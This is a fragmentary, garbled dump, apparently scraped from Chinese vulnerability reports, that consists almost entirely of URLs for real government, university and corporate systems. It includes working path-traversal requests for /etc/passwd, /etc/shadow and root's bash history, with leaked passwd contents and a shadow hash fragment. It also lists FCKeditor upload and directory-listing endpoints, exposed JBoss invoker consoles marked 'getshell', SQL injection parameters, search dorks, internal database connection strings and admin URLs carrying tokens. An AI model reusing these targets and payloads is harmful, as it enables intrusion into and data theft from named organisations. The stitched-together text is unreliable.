http://www.unking.cn/zhaobang/backlog/00/00/560/32/2/sms/1430154035800-local-7.asp","curl":"http://www.unking.cn/zhaobang/backlog/00/00/560/32/2/20150428124734125-local-1.zip","returncode":"10000 http://vipcenter.lenovo.com.cn/.svn/ http://vipcenter.lenovo.com.cn/htaccess.txt http://vipcenter.lenovo.com.cn/admin/includes/ http://vipcenter.lenovo.com.cn/admin/help/ http://vipcenter.lenovo.com.cn/admin/images/ http://vipcenter.lenovo.com.cn/admin/js/ http://vipcenter.lenovo.com.cn/api/ http://vipcenter.lenovo.com.cn/images/ http://vipcenter.lenovo.com.cn/includes/ http://vipcenter.lenovo.com.cn/includes/fckeditor/ http://vipcenter.lenovo.com.cn/pma/setup site:www.99bill.com http://bbs.union.zhuna.cn/install/include/install_2011.php http://**.**.**/index.shtml http://**.**.**/dwbm_bminfoshow.dobmid=800 http://61.139.105.105:8008/R9iPortal/cm/cm_function_save.jsp?gnid=1&checked=1 http://61.139.105.105:8008/R9iPortal/cm/cm_function_save.jsp?gnid=1&checked=1 http://61.139.105.105:8008 http://124.128.96.98:8001 http://web72283.5udns.cn http://210.41.128.120:8002 http://www.jmsxc.com:7001 http://124.128.96.98:8001/UpdateNoticeRtnInfoInc?info_id=1&urid=2 http://124.128.96.98:8001/UpdateNoticeRtnInfoInc?info_id=1&urid=2 http://61.139.105.105:8008 http://124.128.96.98:8001 http://web72283.5udns.cn http://210.41.128.120:8002 http://www.jmsxc.com:7001 http://topic.xcar.com.cn/201503/new_crown/ http://cms.53cms.com http://cms.53cms.com/cms/53cms/Company.asp?id=2 http://cms.53cms.com/cms/53cms/NewsView.asp?id=39 http://cms.53cms.com/cms/53cms/ProductsView.asp?id=81 http://cms.53cms.com/cms/53cms/DownFileView.asp?id=7 http://cms.53cms.com/cms/53cms/ProductsListA.asp?id=36 http://122.228.236.107:8080/ http://122.228.236.107:8080/jmx-console/ http://122.228.236.107:8080/invoker/JMXInvokerServlet http://www.chinacreator.com/ http://www.hnagri.gov.cn/cms/voteManager/voteaction.jsp http://www.hnrm.gov.cn/cms/voteManager/voteaction.jsp http://www.hn408.org/cms/voteManager/voteaction.jsp http://www.hnsyczj.gov.cn/cms/voteManager/voteaction.jsp http://www.hunangtzy.com/cms/voteManager/voteaction.jsp http://119.254.70.76 http://hi.mop.com/user/profile/sendActiveEmail http://www.cnshipping.com.hk/liulc/kgwz/xxzx.asp?type_id=3&title=%B9%AB%CB%BE%B6%AF%CC%AC&nclass_id=656 http://api.airmacau.com.mo/news/vnews_en.asp?id=A00054 http://maths.cumt.edu.cn/math/admin/admin!login.action http://www.sh-shipping.com/new/xw_gsxw_show.asp?Id=2735 http://www.sh-shipping.com/new/search.asp?types=1&keyword=a http://www.aizhenghun.com http://zhaopin.cnpc.com.cn:80 zhaopin.cnpc.com.cn/upload/ zhaopin.cnpc.com.cn/logs/ zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyEducation.htm?selectId=a844e84cd3744a7e85a33d1de33c8e24&ismaxEducation=1&ismaxDegree=1&isfirstEducation=1&maxEducationid=a844e84cd3744a7e85a33d1de33c8e24&firstEducationid=a844e84cd3744a7e85a33d1de33c8e24 zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyCoumunication.htm?selectId=becfb18163f5499aae73ae3eecd43390&hiddenId=becfb18163f5499aae73ae3eecd43390 zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyJobHistory.htm?selectId=f3eed44eaee547d89df1ea2123894099 zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyRewardHistory.htm?selectId=413d78e11f474e7a9049e8b1921128c9 zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyRelativesInfo.htm?selectId=ed1c1febd4a24237bdf0db81f542e9ec zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyGoResumeOther.htm?selectId=c1bd1260936d4937ab98662b82466787 zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyJobHistory.htm?selectId=6572 IP:223.203.209.104:6379 http://122.228.236.107:8080/ http://122.228.236.107:8080/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://122.228.236.107:8080/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://122.228.236.107:8080/editor/filemanager/browser/default/connectors/jsp/connector http://www.08cms.com/ http://www.433100fcw.com/info.php?fid=1&tblprefix=cms_msession http://www.539f.net/info.php?fid=1&tblprefix=cms_msession http://www.gogolz.com/info.php?fid=1&tblprefix=cms_msession http://www.csgfw.cn/info.php?fid=1&tblprefix=cms_msession http://www.pxmfw.com/info.php?fid=1&tblprefix=cms_msession http://gamesvr.kuwo.cn/ http://fw.rrs.com/snaplb/Wiki/Search/list?pageNum=1&pageSize=10&moduleId=2 http://125.64.43.152:8080/login.action http://58.20.108.8:8081/login.action http://60.191.176.146:8080/login.action http://58.49.56.113:8080/login.action http://42.202.133.61:8080/login.action http://218.65.134.26:8080/login.action http://jewelrydesign.aili.com/?a=work&id=1&imgid=2138&m=archives http://jewelrydesign.aili.com/?a=index&m=member&word=l http://jewelrydesign.aili.com/?a=serach&m=archives&title=Mr.&type=2 http://yse.com.cn/news_detail.php?id=97 http://www.svnchina.com/project_ac.php?term= http://www.zugame.com/News/news_show.aspx?id=211&cid=1 http://www.zugame.com/News/news_show.aspx?id=211&cid=1 http://www.zugame.com/News/news_show.aspx?id=211&cid=1 http://www.zugame.com/News/news_show.aspx?id=211&cid=1 http://www.zugame.com/News/news_show.aspx?id=211&cid=1 http://fw.rrs.com/snaplb/profile/getOthersTopicList?userId=lijian0355¤tPage=1 http://fw.rrs.com/snaplb/Wiki/Detail/list?wikiId=3db8957b-9d0e-4cc6-a130-db78bd6bc7e1 http://fw.rrs.com/snaplb/experienceshare/evaluate/anon/comment/init?id=e1c9355f-f613-47d6-9d1f-3da59fa39e83%20&pageNum=0 http://pos.aokang.com:20000/bpos/getUserInfoJSON.jsp?storeids=select%20a.C_STORE_ID%20from%20users http://**.**.**/Index/login http://huodong.homelink.com.cn/xinfang/seckill.php?cid=24 http://**.**.**/dsmrm/ http://fuwu.rrs.com/snaplb/profile/getOthersTopicList?userId=%E6%B5%B7%E5%B0%94%E5%8C%97%E4%BA%AC%E5%88%86%E4%B8%AD%E5%BF%83¤tPage=1 http://219.143.192.52 http://fuwu.rrs.com/snaplb/Wiki/Detail/list?wikiId=049f1c19-dfa8-4564-898b-d8cc63113e1c id:109554,我和该漏洞提出的问题是不相同的,我指出的是fck编辑器的问题,上传点和漏洞id:109554的完全不同,并且我提出的是fck任意文件遍历问题,也和其任意文件下载不同。 http://219.131.221.59:8080/ http://219.131.221.59:8080/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://115.182.44.211/index.php/site/login coding:utf-8-*- http://www.cthhmu.com/about/index.php?id=1 http://fuwu.rrs.com/snaplb/experienceshare/evaluate/anon/comment/init?id=40e474d2-cce9-4c14-bc47-8c248351b0ce&pageNum=0 http://222.178.89.21:8080/oa/ http://222.178.89.21:8080/jmx-consoleing/ http://www.17u.net/WDHandler/MemberAjaxHandler.ashx http://222.178.89.21:8080/oa/login/login/login.action http://222.178.89.21:8080/oa/login/login/login.action http://222.178.89.21:8080/oa/login/login/login.action jar:/yusr/java/jdk1.6.0_21/lib/tools.jar http://qdgl.cttha.com/,来到中国移动某省铁通无线固话经营分析系统页面,如图所示: http://sheji.rrs.com/snaplb/experienceshare/evaluate/anon/comment/init?id=eeed8708-7d64-4059-b79c-f0b3eea2236c%20&pageNum=0 http://219.143.192.122/citsres/.svn/entries http://sheji.rrs.com/snaplb/profile/getOthersTopicList?userId=%E5%B8%83%E6%9E%9700¤tPage=6 http://huxing.rrs.com/snaplb/experienceshare/evaluate/anon/comment/init?id=559a0283-b2d4-4481-b24d-341953f3f0e6%20&pageNum=0 http://huxing.rrs.com/snaplb/Wiki/Detail/list?wikiId=54919fbe-3a50-4346-a9ca-1098acb6e26e http://112.65.142.28/HTlogin.aspx http://112.65.142.28:80/bbs/admin_login.asp http://ask.unitymanual.com/publish/ http://ask.unitymanual.com/ http://laibin.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://wz.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://qz.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://gl.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://lz.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://zq.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://topic.xcar.com.cn/TOKYO/ http://pams.jj-inn.com:8080/jinjiang.web/index.htm http://119.6.98.100:18081/emp/selfOpenAccountAction!preAddZRR.action http://tokyotw.brandoff.tw:80/ http://222.223.191.178 http://xiaoxi.daoyoudao.com/user/login_login.do http://sqlmap.org http://42.159.157.226/ http://erp.touna.cn:9090/logout.action http://acc.rxdai.com:8585/EmployeeQuery/Login.aspx http://222.128.7.115:8090/borrowapply/ http://huati.rrs.com/snaplb/profile/getOthersTopicList?userId=18208299979¤tPage=1 www.zjzfcg.gov.cn http://www.zjzfcg.gov.cn/DownloadServlet?fileName=GP_PROJ_ZBWJ/1238119231178.doc&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/passwd&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/shadow&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../root/.bash_history&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../..//home/weblogic/bea/user_projects/domains/webcluster/applications/webapp/WEB-INF/web.xml&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../../home/apache-tomcat-5.5.33/webapps/new/WEB-INF/classes/jdbc.properties&fileShowName http://yeyou.mop.com/payment/yee_mobile.aspx?co http://sqlmap.org http://sl.zhuna.cn/ http://mall.jinjiang.com/ http://218.83.246.26:8080/WebOA/ http://218.83.246.26:8080/jmx-console/ http://my.51job.com http://www.fjgtzy.gov.cn:81/gxmh/login.aspx http://219.238.6.204:8080/tulip/login.do http://bridge.tongji.edu.cn/lpt3.xcc.asp http://dgyj.tongji.edu.cn/FCKeditor/editor/filemanager/connectors/test.html# http://stru-en.tongji.edu.cn/manage/login.asp http://mat.tongji.edu.cn/bbs/admin_login.asp http://zyxw.tongji.edu.cn/TJPDSYS/InfoDetail.jsp?titleID=555 http://www.zhaopin.com http://pub.px.gw.com.cn/training/download.jsp?filename=training/download.jsp&name=xxx.txt http://nxyqs.com/newexam/newexam.rar http://**.**.** http://ec.zjs.com.cn/zjs/ http://www.sh.10086.cn/shop/app?service=page/base.OrderBackUpCard&listener=initPage http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post&edit_MANAGENUMBER=手机号 http://www.hb-eport.gov.cn/show/news.action http://www.hb-eport.gov.cn/show/news.action jar:/eas63/EAServer6/bin/../lib/eas-server-15.jar:/eas63/EAServer6/bin/../lib:/eas63/EAServer6/bin/../ant/lib/ant-launcher.jar:/eas63/EAServer6/bin/../ant/lib/ant.jar:/eas63/Shared/jdk1.6.0_12/lib/tools.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/sslplus_nio.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/sslplus_jdk15.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/sslplus.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/EccpressoJDK15ECC.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/EccpressoFIPSJca.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/EccpressoFIPS.jar:/eas63/EAServer6/bin/../genfiles/java/classes:/eas63/EAServer6/bin/../lib/ext/jTDS3.jar:/eas63/EAServer6/bin/../lib/ext/jconn3.jar:/eas63/EAServer6/bin/../lib/ext/pbjdbc12110.jar:/eas63/EAServer6/bin/../lib/ext/pbjdbc12115.jar http://www.hb-eport.gov.cn/show/news.action http://bs.qwb.sh.gov.cn/qwb_inter/pages/T_QWB_CHIEFMAIL/new_edit.jsp http://jk.qwb.sh.gov.cn/qwb_inter/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ url:https://admin.qwb.sh.gov.cn https://admin.qwb.sh.gov.cn/qwb_inter/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.chinalife.com.cn/jobs/module/resume/reseducationexperience/preUpdateResEducationExperience.do?educationExperienceId=10011 http://www.chinalife.com.cn/jobs/module/resume/reseducationexperience/preUpdateResEducationExperience.do?educationExperienceId=448151 http://219.143.192.77/citsonlineWeb/switchdo.do?prefix=/online&page=/B2BLogin.do,存在sql注入漏洞可跑表进行脱库。 http://183.237.254.45:8080/Login.aspx http://pkunews.pku.edu.cn:8080/hlftiweb/search.jsp www.chinahr.com http://www.chinahr.com http://m.chinahr.com http://www.21meibo.com/?s=/case/info/id/122 http://college.transn.com http://www.njjgc.cn/nsplatform/ http://218.94.68.41:9200/Account/LogOn?ReturnUrl=%2f http://218.94.68.41:9000/jgcWeb/logon.do http://218.94.68.41:9900/jmx-console/ http://xdga.scol.com.cn/inqu_hudong.asp?channel=%BE%AF%C3%F1%BB%A5%B6%AF&channelname=jmhd&col=%CD%F8%C9%CF%D7%C9%D1%AF&colname=wszx&c=%BE%D6%B3%A4%D0%C5%CF%E4 http://lebi.17500.cn http://ah.wo.com.cn:80/ah/user/IsNotLogin.htm http://122.224.8.2:8080/ctkj_acl/html/new_login.html http://122.224.8.2:8080/marketing/html/market_manage.html http://122.224.8.2:8080/invoker/JMXInvokerServlet,getshell http://lpsdx.gzst.gov.cn/comimglist.aspx?sid=M06&cid=M06&page=1 http://sfc.gzst.gov.cn/comimglist.aspx?sid=M06&cid=M06&page=1 http://mms.wo.com.cn:80/web.do?method=queryServices&channelId=2.4281106E7 http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mtime:x:500:500::/home/mtime:/bin/bash ntp:x:501:501::/home/ntp:/sbin/nologin zabbix:x:502:502::/home/zabbix:/sbin/nologin http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/hosts http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/shadow zg3lClhHg9U9MWD2eK7oPJiR9gVwI82ELJxq4VWW1Byb2AZtgQl1:16458:0:99999:7 http://59.151.32.24/../../../../../../../../../../../../../../../../../root/.bash_history http://cloudclass.ouchn.edu.cn/phone/media!liveMediaList.action-国家开放大学 http://1job.so/jobsearch/search/?keywords=alert&location=%E6%88%90%E9%83%BD&profile_remember=&profile_work_year=&profile_salary_l=&profile_salary_r= http://1job.so/jobsearch/search/?keywords=alert&location=%E6%88%90%E9%83%BD&profile_remember=&profile_work_year=&profile_salary_l=&profile_salary_r= http://gbxx.whu.edu.cn/XxcxAction.action http://www.shjzzx.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.peijia.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.mhhqyy.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://i.goodo.com.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://218.78.210.210/goodo/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.pjhpedu.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://lczx.xhedu.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://shinan.hpe.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://dm.goodo.com.cn/PSTQ/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.hsyr.pudong-edu.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://zpxx.nh.edu.sh.cn/eduplate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.pslq.pudong-edu.sh.cn/goodo/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://bqxx.edu.sh.cn/eduplate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.mhhlyy.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.mlzx.net/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.fuer.lwedu.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.shjzzx.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx举例 http://www.shjzzx.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAll.aspx http://www.shjzzx.com/UpLoad/Blog/blog-1_20150411173950.aspx http://www.shjzzx.com/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.peijia.com/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://i.goodo.com.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://218.78.210.210/goodo/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.pjhpedu.com/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://lczx.xhedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.mhhqyy.com/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://shinan.hpe.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://dm.goodo.com.cn/PSTQ/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.hsyr.pudong-edu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://zpxx.nh.edu.sh.cn/eduplate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.pslq.pudong-edu.sh.cn/goodo/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://bqxx.edu.sh.cn/eduplate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.mhhlyy.com/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.mlzx.net/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.fuer.lwedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx举例 http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAll.aspx inurl:eduplate/GoodoBlog http://www.shjzzx.com/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.peijia.com/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.mhhqyy.com/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://i.goodo.com.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://218.78.210.210/goodo/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.pjhpedu.com/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://lczx.xhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://shinan.hpe.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://dm.goodo.com.cn/PSTQ/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.hsyr.pudong-edu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://zpxx.nh.edu.sh.cn/eduplate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.pslq.pudong-edu.sh.cn/goodo/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://bqxx.edu.sh.cn/eduplate/goodoblog/ClassPhtoStuAdd.aspx http://www.mhhlyy.com/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.mlzx.net/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.fuer.lwedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx举例 http://syxx.mhedu.sh.cn/Eduplate/GoodoBlog/ClassPhtoStuAll.aspx http://syxx.mhedu.sh.cn/UpLoad/Blog/blog-1_20150406235937.aspx inurl:eduplate/GoodoBlog http://www.shjzzx.com/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.peijia.com/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.mhhqyy.com/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://i.goodo.com.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://218.78.210.210/goodo/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.pjhpedu.com/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://lczx.xhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://shinan.hpe.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://dm.goodo.com.cn/PSTQ/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.hsyr.pudong-edu.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://zpxx.nh.edu.sh.cn/eduplate/GoodoBlog/ClassPhtoAdd.aspx http://www.pslq.pudong-edu.sh.cn/goodo/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://bqxx.edu.sh.cn/eduplate/goodoblog/ClassPhtoAdd.aspx http://www.mhhlyy.com/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.mlzx.net/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.fuer.lwedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx举例 http://syxx.mhedu.sh.cn/Eduplate/GoodoBlog/ClassPhtoall.aspx http://syxx.mhedu.sh.cn/UpLoad/Blog/blog-1_20150406214941.aspx http://www.nnzcw.cn/admin/login.aspx http://www.nnzcw.cn/admin/changepwd.aspx http://www.nnzcw.cn/commenapi/ http://jyz.homelink.com.cn/mypower/downloadUrl.php jyz.homelink.com.cn/mypower/Home/Product/professionallist/pid/1294/order/haopingdesc?citySun=0&CITY=%25e5%258c http://222.135.110.105:8080/gssols/login/login!check.do http://222.135.110.105:8080/gssols/login/login!check.do http://222.135.110.105:8080/gssols/login/login!check.do http://www.fuyin.tv/index.php/content/page/id/12 http://222.135.110.105:8080/gssols/login/login!check.do http://222.135.110.105:8080/jmx-console/ http://yf.hhedai.com/upgrade.php?m=editor&f=edit&filePath=L3Zhci93d3cvaHRtbC96ZW50YW9wbXMvL2NvbmZpZy9teS5waHA=&action=edit http://119.180.20.200:8080/ytjyc/login.do http://119.180.20.200:8080/jmx-console/ http://www.aybmw.com/ http://vote.aybm.cn/ http://vote.aybm.cn/siteserver/forgetPassword.aspx http://www.fj12333.gov.cn:268/fwpt/registerActionBefore.html https://sfglnanchong.nacao.org.cn/publish/299/index.html http://home.www2.fang.com/ http://work.fang.com https://passport.souyidai.com/password/findpassword mail.tom.com/info/ad/mailpop-dzm/adv.txt position:absolute width:530px height:530px position:absolute width:200px height:115px cursor:pointer position:absolute width:41px height:39px http://pass.tom.com/dologin.php http://f.game.tom.com/ftx/index.html http://113.57.194.131:8080/SS/userLogin.action http://113.57.194.131:8080/SS/userLogin.action http://113.57.194.131:8080/SS/userLogin.action http://www.wcb.yn.gov.cn:8080/Default.aspx http://open.zhuna.cn/g/ http://open.zhuna.cn/g/api/r_hotel/ www.ecpic.com.cn http://www.ecpic.com.cn http://work.fang.com/v2/sys/sysFileAct.do?method=download&sysfileid=787404&objId=201708&downType=2 http://work.fang.com/v2/sys/sysFileAct.do?method=downloadFileById&fileid=542009 http://work.fang.com/v2/sys/sysFileAct.do?method=toShowPic&xtype=1&objId=48504&sysfileid=643290&downType=1 http://www.moneyking.cn/admin/login.htm open.ppmoney.com/index.php/Third/Rong360/_ http://pz.ppmoney.com/admin/list/token/06b41dbb6ae9edb573ef9c5d6b6b6bf1 http://pz.ppmoney.com/admin/Stat/olist/token/a0ca130d81993cc55c1377728e96fed1 http://aqe.wyn88.com/Quickas/wefeedback/wefeedback.jsp http://aqe.wyn88.com/Quickas/login.jsp http://aqe.wyn88.com/Quickas/wefeedback/wefeedback.jsp http://www.cits.cn/member/bind.html http://www.xznsyh.com/messLook.php?id=131 http://sqlmap.org http://open.chrome.360.cn/extension_dev/content_scripts.html) www.oppoforums.com http://54.83.18.184:81/列目录 http://54.83.18.184:81/www.oppoforums.com/oppo.global.forum.tar.gz url:http://59.175.196.51:8080/bpmsplatform/index.jsp http://59.175.196.51:8080/jmx-console/ http://59.175.196.51:8080/invoker/JMXInvokerServlet http://gzzp.gzzypx.net/ http://gzzp.gzzypx.net/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media http://bk.sz96296.com/ http://bk.sz96296.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=* http://1.85.40.234:8080,该ip80端口对应的是 http://1.85.40.234:8080/invoker/JMXInvokerServlet,getshell http://webplus.njau.edu.cn/s/0/manage/main.jspy http://webplus.gzu.edu.cn/s/0/manage/main.jspy http://webplus.xmu.edu.cn/s/0/manage/main.jspy http://www.ouc.edu.cn/login.jsp?_p=YXM9MSZwPTEmbT1OJg__ http://www.webplus.net.cn/s/0/main.jspy https://github.com/gao715108023/memcached/blob/master/memcached-client/src/main/resources/filters/filter-product.properties jdbc:mysql://sfhaitaoqd1.mysql.rds.aliyuncs.com:3306/haitao_products_v2?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull http://113.57.194.131:8080/SS/ http://113.57.194.131:8080/jmx-console http://**.**.**/XS/admin.aspx http://fengkong.gidon.cn/findpassword/getCodePage.action http://IQCD-D0049:8080/uploader/upload http://mvs-stg.pingan.com.cn:8080/uploader/upload http://10.25.32.11:8787/uploader/upload http://IQCD-D0049:8080/uploader/validateVUser http://mvs-stg.pingan.com.cn:8080/uploader/validateVUser http://10.25.32.11:8787/uploader/upload http://192.168.1.244:8088/zhengXin/remoting/hessianRemote http://203.110.164.62:8088/zhengXin/remoting/hessianRemote http://www.benbei365.com/remoting/hessianRemote jdbc:oracle:thin:@127.0.0.1:1521:orcl http://192.168.1.222:8080/upload/pic/20131124/1385306431517.png http://127.0.0.1:8080/upload/pic http://app.mapabc.com/apis?t=flashmap&v=2.4.1&key=0f7780e5262c159dc1b1fd417036071653c30e2674ff9ace22392351f16c67d281f6ad575c507b05 http://app.mapabc.com/apis?t=flashmap&v=2.4.1&key=ad175860c5046a5365f38c1876b28f258deb68b3ea52217c3c0ff7a961de3712ef0216c89ce9a7ee http://app.mapabc.com/apis?t=flashmap&v=2.4.1&key=f6c97a7f64063cfee7c2dc2157847204d4dbf093b023619a3f7f23383d3e7fe5819c30d2f5f9fb07 http://115.29.233.153 http://app.mapabc.com/apis?t=flashmap&v=2.4.1&key=d2f4070d7464f17405922e8e73bd42d61e9ec646728b9c6e6500369e3b7d73952997ada9993d6ab0 jdbc:mysql://192.168.1.111:3306/risk_control jdbc:mysql://localhost:3306/risk_control http://www.gidon.cn/jdct/webPage/account/pay_result.jsp http://www.gidon.cn/jdct/webURechargeRecordAction_backPay.do http://www.gidon.cn jdbc:oracle:thin:@192.168.0.58:1521:orcl jdbc:sqlserver://192.168.1.144\\MSSQLSERVER:1433;databaseName=P2P_DB jdbc:mysql\://localhost:3306/sa http://admin.wcif.cn/admin/login!login.action http://www.leawe.com/case/ http://gxlx.ohdev.cn/web/ http://nbxx.ohdev.cn/web/ http://www.yqhqyz.com/web/ http://xqxx.ohdev.cn/web/ http://lasx.ohdev.cn/web/ http://www.sysxedu.net/web/ http://www.yjobwz.com/web/ http://pysyzx.pyedu.cn/web/ http://www.qxzzx.com/web/ http://www.ailu.cc/web/ http://www.rattsx.com/web/ http://www.rafygx.com/web/ http://www.raxcyx.com/web/ http://www.wzgxzx.com/web/ http://pysyzx.pyedu.cn/web/ http://www.syzx.yje.cn/Web/ http://www.wctvu.com/web/ http://pqczxx.ohdev.cn/ http://xyyx.ohdev.cn/web/ 